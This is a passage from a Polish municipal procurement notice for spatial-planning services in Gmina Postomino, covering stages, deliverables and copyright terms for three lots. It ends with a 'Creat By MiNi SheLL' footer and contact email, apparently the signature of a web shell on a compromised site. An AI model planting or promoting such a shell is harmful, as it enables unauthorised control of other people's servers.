d)prezentacja projektu zmiany w czasie dyskusji publicznej oraz obecność na wyłożeniu projektu zmiany do publicznego wglądu w Urzędzie Gminy;
e)analiza uwag wniesionych do wyłożonego do publicznego wglądu projektu zmiany;
f)przygotowanie projektu zmiany ze zmianami wynikającymi z uwzględnionych uwag wniesionych w okresie wyłożenia projektu zmiany do publicznego wglądu oraz sporządzenie listy nieuwzględnionych uwag wraz z uzasadnieniem;
g)przygotowanie projektu uchwał do uchwalenia wraz z uzasadnieniem;
h)wprowadzenie zmian do projektów wynikających z uwzględnienia przez Radę Gminy wniesionych uwag;
i)powtórzenie wymaganych czynności w zakresie dokonanych zmian.
4)Etap IV - Przekazanie materiałów:Wykonawca przekaże Zamawiającemu komplet materiałów w następujących ilościach:
A. dla części 1:
a)rysunek zmiany studium kolorowy w skali 1:10000 - 1 egz. + wersja elektroniczna; 
b)rysunek czarno - biały w skali 1:10000 - 2 egz. +wersja elektroniczna;
c)rysunek pomniejszony kolorowy w skali 1:25000 - 4 egz. + wersja elektroniczna;
d)ustalenia tekstowe zmiany studium w formie tradycyjnej - 2 egz. + wersja elektroniczna;
e)uchwałę wraz z załącznikami zapisaną w wersji elektronicznej (XML);
f)dokumentację formalno - prawną dotyczącą uchwalenia zmiany studium 
i przeprowadzenia strategicznej oceny oddziaływania na środowisko - 1 egz.;
g)prognozę oddziaływania na środowisko - 2 egz. + wersja elektroniczna;
h)opracowanie ekofizjograficzne - 2 egz. + wersja elektroniczna. 
B. dla części 2 i 3:
a) rysunek zmiany planu kolorowy w skali 1:1000 - 1 egz. + wersja elektroniczna; 
b) rysunek czarno - biały w skali 1:1000 - 2 egz. +wersja elektroniczna;
c) rysunek pomniejszony kolorowy w skali 1:2000 - 4 egz. + wersja elektroniczna;
d) ustalenia tekstowe zmiany planów w formie tradycyjnej - 2 egz. + wersja elektroniczna;
e) uchwałę wraz z załącznikami zapisaną w wersji elektronicznej (XML);
f) dokumentację formalno - prawną dotyczącą uchwalenia zmian planów i przeprowadzenia strategicznej   oceny oddziaływania na środowisko - 1 egz.;
g) prognozę oddziaływania na środowisko - 2 egz. + wersja elektroniczna;
h) prognozę skutków finansowych uchwalenia zmiany planu - 1 egz. + wersja elektroniczna;
i) opracowanie ekofizjograficzne - 2 egz. + wersja elektroniczna. 
Materiały zostaną przyjęte protokołem zdawczo -odbiorczym.
4.Wykonawca w ramach niniejszego zamówienia zobowiązany jest do:
a)uzgodnienia projektów uchwał z Wójtem Gminy Postomino;
b)przedstawienia w/w opracowań na sesji Rady Gminy Postomino;
c)przygotowania projektów pism wraz z rozdzielnikiem dot. zawiadomień, uzgodnień oraz projektów odpowiedzi na korespondencję dotyczącą przedmiotu zamówienia;
d)skompletowania dokumentacji formalno-prawnej dotyczącej procedury uchwalenia zmiany studium, planów;
e)skompletowania dokumentacji formalno - prawnej dotyczącej przeprowadzenia strategicznej oceny oddziaływania na środowisko sporządzonych dokumentów.
5.Wykonawca w ramach niniejszego zamówienia uwzględni koszty wykonania przedmiotu zamówienia w tym koszt wykonania materiałów studialnych, opracowania ekofizjografii, prognozy oddziaływania na środowisko, oraz koszty wynikające z procedury uchwalania zmiany studium. Koszt przesyłek pocztowych w zakresie zawiadomień, uzgadniania i opiniowania oraz ogłoszeń prasowych pokrywa Zamawiający. Podkład mapowy dostarcza Zamawiający.
6.Prawa autorskie.
1)Z mocy umowy zawartej w niniejszym postępowaniu Wykonawca wraz z projektantami (twórcami) przeniesie na rzecz Zamawiającego własność wszelkich praw autorskich do  opracowania stanowiącego utwory w rozumieniu przepisów ustawy z dnia 04.02.1994 r. o prawie autorskim i prawach pokrewnych (tj. Dz. U. Nr 90 poz. 631 z późn. zm.),
2)Przeniesienie własności autorskich praw majątkowych do opracowania stanowiącego przedmiot umowy następuje bezwarunkowo na czas nieokreślony w ramach wynagrodzenia za wykonanie zamówienia,
3)Wykonawca podpisując umowę zawartą w wyniku niniejszego postępowania oświadcza, że prawo do przeniesienia własności autorskich praw majątkowych we wskazanym wyżej zakresie posiada i że nie  podlega ono żadnym ograniczeniom 
i obciążeniom.
7.W przypadku stwierdzenia, że usługa wykonywana jest niezgodnie z obowiązującymi przepisami Zamawiający może odmówić zapłaty i żądać ich ponownego wykonania lub odstąpić od umowy z winy Wykonawcy z naliczeniem kary umownej.
8.Zaleca się Wykonawcom przeprowadzenie szczegółowej wizji lokalnej w terenie celem uzyskania wszystkich informacji koniecznych do przygotowania oferty i zawarcia umowy. Każdy z Wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.
9.Szczegółowe warunki realizacji przedmiotu zamówienia określone są w projekcie umowy w dziale III SIWZ. 
10.Kod Wspólnego Słownika Zamówień CPV: 71410000-5 Usługi planowania przestrzennego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zmiana miejscowego planu zagospodarowania przestrzennego miejscowosci Nacmierz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest sporządzenie zmiany studium uwarunkowań i kierunków zagospodarowania Gminy Postomino o powierzchni - 22.724,00 ha, zmiana miejscowego planu zagospodarowania przestrzennego m. Nacmierz o powierzchni ca. - 40,00 ha oraz zmiana miejscowego planu zagospodarowania przestrzennego m. Jarosławiec Słoneczna - Spacerowa o powierzchni - 2,20 ha.
2.Przedmiot zamówienia został podzielony na trzy części: 
część 1 - zmiana studium uwarunkowań i kierunków zagospodarowania Gminy Postomino o powierzchni - 22.724,00 ha
część 2 - zmiana miejscowego planu zagospodarowania przestrzennego m. Nacmierz o powierzchni ca. - 40,00 ha
część 3 - zmiana miejscowego planu zagospodarowania przestrzennego m. Jarosławiec Słoneczna - Spacerowa o powierzchni - 2,20 ha.
3.Przedmiot zamówienia obejmuje w szczególności:
1)sporządzenie projektów zmian zgodnie z ustawą o planowaniu i zagospodarowaniu przestrzennym z dnia 27 marca 2003 roku (tj Dz. U. 2012.647 z późn. zm), wraz z aktami wykonawczymi do ww. ustawy;
2)przeprowadzenie pełnej procedury formalno-prawnej wynikającej z ustawy 
o planowaniu i zagospodarowaniu przestrzennym z uwzględnieniem wymogów określonych w ustawie z dnia 27 kwietnia  2001 r. Prawo ochrony środowiska (tj. Dz. U. 2013.1232) oraz ustawie z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. Nr 2013.1235).
4.Przedmiot zamówienia obejmuje wykonanie usługi w IV etapach (dotyczy poszczególnych części zamówienia):
1)Etap I - analizy i studia, w tym:
a)zebranie, analiza i sprawdzenie materiałów wyjściowych, analiza stanu istniejącego,
b)analiza obszaru wskazanego do sporządzenia zmiany określonych w części 1, 2 i 3 oraz innymi opracowaniami dla danego obszaru,
c)analiza uwarunkowań wynikających z zapisów planów dotychczas obowiązujących;
d)analiza złożonych uwag i wniosków do zmiany odpowiednio dla poszczególnych części z przygotowaniem projektu rozstrzygnięcia Wójta o sposobie ich uwzględnienia;
e)analiza uwarunkowań ekofizjograficznych - opracowanie dotyczące obszaru określonego w części 1, 2 i 3 wykonane zgodnie z rozporządzeniem Ministra Środowiska z dnia 9 września 2002 roku w sprawie opracowań ekofizjografcznych (Dz. U. z 2002r. nr 155 poz.1298) - opracowanie w 2 egz.;
f)prognoza oddziaływania na środowisko;
g)prognoza skutków finansowych uchwalenia zmiany planu;  
h)wykonanie planszy inwentaryzacyjnej w skali 1:10000 (dla części 1);
i)wykonanie koncepcji programowo- przestrzennej w skali 1:10000 (dla części1);
dla części 2 i 3 w skali 1:1000.
2)Etap II - projekt zmiany - czynności w zakresie sporządzenia projektu studium, planów
a)plansza podstawowa w skali 1:10000 (dla części 1) dla części 2 i 3 w skali 1:1000 zawierająca elementy zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. z  2003r. nr 164 poz. 1587);
b)opracowanie tekstu zmiany w formie uchwały zgodnie z ustawą o planowaniu 
i zagospodarowaniu przestrzennym;
c)wykonanie prognozy oddziaływania na środowisko ustaleń zmian zgodnie ze stosownym uzgodnieniem zakresu i stopnia szczegółowości informacji wymaganych w prognozie; 
d)przedłożenie projektu zmian wraz z prognozą do akceptacji Wójtowi Gminy;
e)przedłożenie do zaopiniowania projektu zmiany komisji urbanistyczno architektonicznej;
f)przygotowanie projektu zmiany do ustawowego opiniowania i uzgadniania - w ilości wynikającej z rozdzielnika.
3)Etap III - uchwalanie zmiany- czynności w zakresie procedury uchwalenia studium i planów:
a)uzyskanie i analiza wszelkich wymaganych uzgodnień i opinii;
b)wprowadzenie zmian do projektu zmiany wynikających z uzyskanych uzgodnień 
i opinii;
c)przygotowanie kompletu materiałów do wyłożenia projektu zmiany do publicznego wglądu;
d)prezentacja projektu zmiany w czasie dyskusji publicznej oraz obecność na wyłożeniu projektu zmiany do publicznego wglądu w Urzędzie Gminy;
e)analiza uwag wniesionych do wyłożonego do publicznego wglądu projektu zmiany;
f)przygotowanie projektu zmiany ze zmianami wynikającymi z uwzględnionych uwag wniesionych w okresie wyłożenia projektu zmiany do publicznego wglądu oraz sporządzenie listy nieuwzględnionych uwag wraz z uzasadnieniem;
g)przygotowanie projektu uchwał do uchwalenia wraz z uzasadnieniem;
h)wprowadzenie zmian do projektów wynikających z uwzględnienia przez Radę Gminy wniesionych uwag;
i)powtórzenie wymaganych czynności w zakresie dokonanych zmian.
4)Etap IV - Przekazanie materiałów:Wykonawca przekaże Zamawiającemu komplet materiałów w następujących ilościach:
A. dla części 1:
a)rysunek zmiany studium kolorowy w skali 1:10000 - 1 egz. + wersja elektroniczna; 
b)rysunek czarno - biały w skali 1:10000 - 2 egz. +wersja elektroniczna;
c)rysunek pomniejszony kolorowy w skali 1:25000 - 4 egz. + wersja elektroniczna;
d)ustalenia tekstowe zmiany studium w formie tradycyjnej - 2 egz. + wersja elektroniczna;
e)uchwałę wraz z załącznikami zapisaną w wersji elektronicznej (XML);
f)dokumentację formalno - prawną dotyczącą uchwalenia zmiany studium 
i przeprowadzenia strategicznej oceny oddziaływania na środowisko - 1 egz.;
g)prognozę oddziaływania na środowisko - 2 egz. + wersja elektroniczna;
h)opracowanie ekofizjograficzne - 2 egz. + wersja elektroniczna. 
B. dla części 2 i 3:
a) rysunek zmiany planu kolorowy w skali 1:1000 - 1 egz. + wersja elektroniczna; 
b) rysunek czarno - biały w skali 1:1000 - 2 egz. +wersja elektroniczna;
c) rysunek pomniejszony kolorowy w skali 1:2000 - 4 egz. + wersja elektroniczna;
d) ustalenia tekstowe zmiany planów w formie tradycyjnej - 2 egz. + wersja elektroniczna;
e) uchwałę wraz z załącznikami zapisaną w wersji elektronicznej (XML);
f) dokumentację formalno - prawną dotyczącą uchwalenia zmian planów i przeprowadzenia strategicznej   oceny oddziaływania na środowisko - 1 egz.;
g) prognozę oddziaływania na środowisko - 2 egz. + wersja elektroniczna;
h) prognozę skutków finansowych uchwalenia zmiany planu - 1 egz. + wersja elektroniczna;
i) opracowanie ekofizjograficzne - 2 egz. + wersja elektroniczna. 
Materiały zostaną przyjęte protokołem zdawczo -odbiorczym.
4.Wykonawca w ramach niniejszego zamówienia zobowiązany jest do:
a)uzgodnienia projektów uchwał z Wójtem Gminy Postomino;
b)przedstawienia w/w opracowań na sesji Rady Gminy Postomino;
c)przygotowania projektów pism wraz z rozdzielnikiem dot. zawiadomień, uzgodnień oraz projektów odpowiedzi na korespondencję dotyczącą przedmiotu zamówienia;
d)skompletowania dokumentacji formalno-prawnej dotyczącej procedury uchwalenia zmiany studium, planów;
e)skompletowania dokumentacji formalno - prawnej dotyczącej przeprowadzenia strategicznej oceny oddziaływania na środowisko sporządzonych dokumentów.
5.Wykonawca w ramach niniejszego zamówienia uwzględni koszty wykonania przedmiotu zamówienia w tym koszt wykonania materiałów studialnych, opracowania ekofizjografii, prognozy oddziaływania na środowisko, oraz koszty wynikające z procedury uchwalania zmiany studium. Koszt przesyłek pocztowych w zakresie zawiadomień, uzgadniania i opiniowania oraz ogłoszeń prasowych pokrywa Zamawiający. Podkład mapowy dostarcza Zamawiający.
6.Prawa autorskie.
1)Z mocy umowy zawartej w niniejszym postępowaniu Wykonawca wraz z projektantami (twórcami) przeniesie na rzecz Zamawiającego własność wszelkich praw autorskich do  opracowania stanowiącego utwory w rozumieniu przepisów ustawy z dnia 04.02.1994 r. o prawie autorskim i prawach pokrewnych (tj. Dz. U. Nr 90 poz. 631 
z późn. zm.),
2)Przeniesienie własności autorskich praw majątkowych do opracowania stanowiącego przedmiot umowy następuje bezwarunkowo na czas nieokreślony w ramach wynagrodzenia za wykonanie zamówienia,
3)Wykonawca podpisując umowę zawartą w wyniku niniejszego postępowania oświadcza, że prawo do przeniesienia własności autorskich praw majątkowych we wskazanym wyżej zakresie posiada i że nie  podlega ono żadnym ograniczeniom 
i obciążeniom.
7.W przypadku stwierdzenia, że usługa wykonywana jest niezgodnie z obowiązującymi przepisami Zamawiający może odmówić zapłaty i żądać ich ponownego wykonania lub odstąpić od umowy z winy Wykonawcy z naliczeniem kary umownej.
8.Zaleca się Wykonawcom przeprowadzenie szczegółowej wizji lokalnej w terenie celem uzyskania wszystkich informacji koniecznych do przygotowania oferty i zawarcia umowy. Każdy z Wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.
9.Szczegółowe warunki realizacji przedmiotu zamówienia określone są w projekcie umowy w dziale III SIWZ. 
10.Kod Wspólnego Słownika Zamówień CPV: 71410000-5 Usługi planowania przestrzennego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zmiana miejscowego planu zagospodarowania przestrzennego miejscowości Jarosławiec Słoneczna - Spacerowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest sporządzenie zmiany studium uwarunkowań i kierunków zagospodarowania Gminy Postomino o powierzchni - 22.724,00 ha, zmiana miejscowego planu zagospodarowania przestrzennego m. Nacmierz o powierzchni ca. - 40,00 ha oraz zmiana miejscowego planu zagospodarowania przestrzennego m. Jarosławiec Słoneczna - Spacerowa o powierzchni - 2,20 ha.
2.Przedmiot zamówienia został podzielony na trzy części: 
część 1 - zmiana studium uwarunkowań i kierunków zagospodarowania Gminy Postomino o powierzchni - 22.724,00 ha
część 2 - zmiana miejscowego planu zagospodarowania przestrzennego m. Nacmierz 
o powierzchni ca. - 40,00 ha
część 3 - zmiana miejscowego planu zagospodarowania przestrzennego m. Jarosławiec Słoneczna - Spacerowa o powierzchni - 2,20 ha.
3.	Przedmiot zamówienia obejmuje w szczególności:
1)	sporządzenie projektów zmian zgodnie z ustawą o planowaniu i zagospodarowaniu przestrzennym z dnia 27 marca 2003 roku (tj Dz. U. 2012.647 z późn. zm), 
wraz z aktami wykonawczymi do ww. ustawy;
2)	przeprowadzenie pełnej procedury formalno-prawnej wynikającej z ustawy 
o planowaniu i zagospodarowaniu przestrzennym z uwzględnieniem wymogów określonych w ustawie z dnia 27 kwietnia  2001 r. Prawo ochrony środowiska (tj. Dz. U. 2013.1232) oraz ustawie z dnia 3 października 2008 r. o udostępnianiu informacji 
o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. Nr 2013.1235).
4.	Przedmiot zamówienia obejmuje wykonanie usługi w IV etapach (dotyczy poszczególnych części zamówienia):
1)	Etap I - analizy i studia, w tym:
a)	zebranie, analiza i sprawdzenie materiałów wyjściowych, analiza stanu istniejącego,
b)	analiza obszaru wskazanego do sporządzenia zmiany określonych w części 1, 2 i 3 oraz innymi opracowaniami dla danego obszaru,
c)	analiza uwarunkowań wynikających z zapisów planów dotychczas obowiązujących;
d)	analiza złożonych uwag i wniosków do zmiany odpowiednio dla poszczególnych części 
z przygotowaniem projektu rozstrzygnięcia Wójta o sposobie ich uwzględnienia;
e)	analiza uwarunkowań ekofizjograficznych - opracowanie dotyczące obszaru określonego w części 1, 2 i 3 wykonane zgodnie z rozporządzeniem Ministra Środowiska z dnia 
9 września 2002 roku w sprawie opracowań ekofizjografcznych (Dz. U. z 2002r. nr 155 poz.1298) - opracowanie w 2 egz.;
f)	prognoza oddziaływania na środowisko;
g)	prognoza skutków finansowych uchwalenia zmiany planu;  
h)	wykonanie planszy inwentaryzacyjnej w skali 1:10000 (dla części 1);
i)	wykonanie koncepcji programowo- przestrzennej w skali 1:10000 (dla części1);
dla części 2 i 3 w skali 1:1000.
2)	Etap II - projekt zmiany - czynności w zakresie sporządzenia projektu studium, planów
a)	plansza podstawowa w skali 1:10000 (dla części 1) dla części 2 i 3 w skali 1:1000 zawierająca elementy zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r. w sprawie wymaganego zakresu projektu miejscowego 	planu zagospodarowania przestrzennego (Dz. U. z  2003r. nr 164 poz. 1587);
b)	opracowanie tekstu zmiany w formie uchwały zgodnie z ustawą o planowaniu 
i zagospodarowaniu przestrzennym;
c)	wykonanie prognozy oddziaływania na środowisko ustaleń zmian zgodnie ze stosownym uzgodnieniem zakresu i stopnia szczegółowości informacji wymaganych w prognozie; 
d)	przedłożenie projektu zmian wraz z prognozą do akceptacji Wójtowi Gminy;
e)	przedłożenie do zaopiniowania projektu zmiany komisji urbanistyczno architektonicznej;
f)	przygotowanie projektu zmiany do ustawowego opiniowania i uzgadniania - w ilości wynikającej z rozdzielnika.
3)	Etap III - uchwalanie zmiany- czynności w zakresie procedury uchwalenia studium 
i planów:
a)	uzyskanie i analiza wszelkich wymaganych uzgodnień i opinii;
b)	wprowadzenie zmian do projektu zmiany wynikających z uzyskanych uzgodnień 
i opinii;
c)	przygotowanie kompletu materiałów do wyłożenia projektu zmiany do publicznego wglądu;
d)	prezentacja projektu zmiany w czasie dyskusji publicznej oraz obecność na wyłożeniu projektu zmiany do publicznego wglądu w Urzędzie Gminy;
e)	analiza uwag wniesionych do wyłożonego do publicznego wglądu projektu zmiany;
f)	przygotowanie projektu zmiany ze zmianami wynikającymi z uwzględnionych uwag wniesionych w okresie wyłożenia projektu zmiany do publicznego wglądu oraz sporządzenie listy nieuwzględnionych uwag wraz z uzasadnieniem;
g)	przygotowanie projektu uchwał do uchwalenia wraz z uzasadnieniem;
h)	wprowadzenie zmian do projektów wynikających z uwzględnienia przez Radę Gminy wniesionych uwag;
i)	powtórzenie wymaganych czynności w zakresie dokonanych zmian.
4)	Etap IV - Przekazanie materiałów:Wykonawca przekaże Zamawiającemu komplet materiałów w następujących ilościach:
A. dla części 1:
a)	rysunek zmiany studium kolorowy w skali 1:10000 - 1 egz. + wersja elektroniczna; 
b)	rysunek czarno - biały w skali 1:10000 - 2 egz. +wersja elektroniczna;
c)	rysunek pomniejszony kolorowy w skali 1:25000 - 4 egz. + wersja elektroniczna;
d)	ustalenia tekstowe zmiany studium w formie tradycyjnej - 2 egz. + wersja elektroniczna;
e)	uchwałę wraz z załącznikami zapisaną w wersji elektronicznej (XML);
f)	dokumentację formalno - prawną dotyczącą uchwalenia zmiany studium 
i przeprowadzenia strategicznej oceny oddziaływania na środowisko - 1 egz.;
g)	prognozę oddziaływania na środowisko - 2 egz. + wersja elektroniczna;
h)	opracowanie ekofizjograficzne - 2 egz. + wersja elektroniczna. 
B. dla części 2 i 3:
a) rysunek zmiany planu kolorowy w skali 1:1000 - 1 egz. + wersja elektroniczna; 
b) rysunek czarno - biały w skali 1:1000 - 2 egz. +wersja elektroniczna;
c) rysunek pomniejszony kolorowy w skali 1:2000 - 4 egz. + wersja elektroniczna;
d) ustalenia tekstowe zmiany planów w formie tradycyjnej - 2 egz. + wersja elektroniczna;
e) uchwałę wraz z załącznikami zapisaną w wersji elektronicznej (XML);
f) dokumentację formalno - prawną dotyczącą uchwalenia zmian planów i przeprowadzenia strategicznej   oceny oddziaływania na środowisko - 1 egz.;
g) prognozę oddziaływania na środowisko - 2 egz. + wersja elektroniczna;
h) prognozę skutków finansowych uchwalenia zmiany planu - 1 egz. + wersja elektroniczna;
i) opracowanie ekofizjograficzne - 2 egz. + wersja elektroniczna. 
Materiały zostaną przyjęte protokołem zdawczo -odbiorczym.
4.	Wykonawca w ramach niniejszego zamówienia zobowiązany jest do:
a)	uzgodnienia projektów uchwał z Wójtem Gminy Postomino;
b)	przedstawienia w/w opracowań na sesji Rady Gminy Postomino;
c)	przygotowania projektów pism wraz z rozdzielnikiem dot. zawiadomień, uzgodnień oraz projektów odpowiedzi na korespondencję dotyczącą przedmiotu zamówienia;
d)	skompletowania dokumentacji formalno-prawnej dotyczącej procedury uchwalenia zmiany studium, planów;
e)	skompletowania dokumentacji formalno - prawnej dotyczącej przeprowadzenia strategicznej oceny oddziaływania na środowisko sporządzonych dokumentów.
5.	Wykonawca w ramach niniejszego zamówienia uwzględni koszty wykonania przedmiotu zamówienia w tym koszt wykonania materiałów studialnych, opracowania ekofizjografii, prognozy oddziaływania na środowisko, oraz koszty wynikające z procedury uchwalania zmiany studium. Koszt przesyłek pocztowych w zakresie zawiadomień, uzgadniania 
i opiniowania oraz ogłoszeń prasowych pokrywa Zamawiający. Podkład mapowy dostarcza Zamawiający.
6.	Prawa autorskie.
1)	Z mocy umowy zawartej w niniejszym postępowaniu Wykonawca wraz z projektantami (twórcami) przeniesie na rzecz Zamawiającego własność wszelkich praw autorskich do  opracowania stanowiącego utwory w rozumieniu przepisów ustawy z dnia 04.02.1994 r. o prawie autorskim i prawach pokrewnych (tj. Dz. U. Nr 90 poz. 631 
z późn. zm.),
2)	Przeniesienie własności autorskich praw majątkowych do opracowania stanowiącego przedmiot umowy następuje bezwarunkowo na czas nieokreślony w ramach wynagrodzenia za wykonanie zamówienia,
3)	Wykonawca podpisując umowę zawartą w wyniku niniejszego postępowania oświadcza, że prawo do przeniesienia własności autorskich praw majątkowych we wskazanym wyżej zakresie posiada i że nie  podlega ono żadnym ograniczeniom 
i obciążeniom.
7.	W przypadku stwierdzenia, że usługa wykonywana jest niezgodnie z obowiązującymi przepisami Zamawiający może odmówić zapłaty i żądać ich ponownego wykonania lub odstąpić od umowy z winy Wykonawcy z naliczeniem kary umownej.
8.	Zaleca się Wykonawcom przeprowadzenie szczegółowej wizji lokalnej w terenie celem uzyskania wszystkich informacji koniecznych do przygotowania oferty i zawarcia umowy. Każdy z Wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia.
9.	Szczegółowe warunki realizacji przedmiotu zamówienia określone są w projekcie umowy 
w dziale III SIWZ. 
10.	Kod Wspólnego Słownika Zamówień CPV: 71410000-5 Usługi planowania przestrzennego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com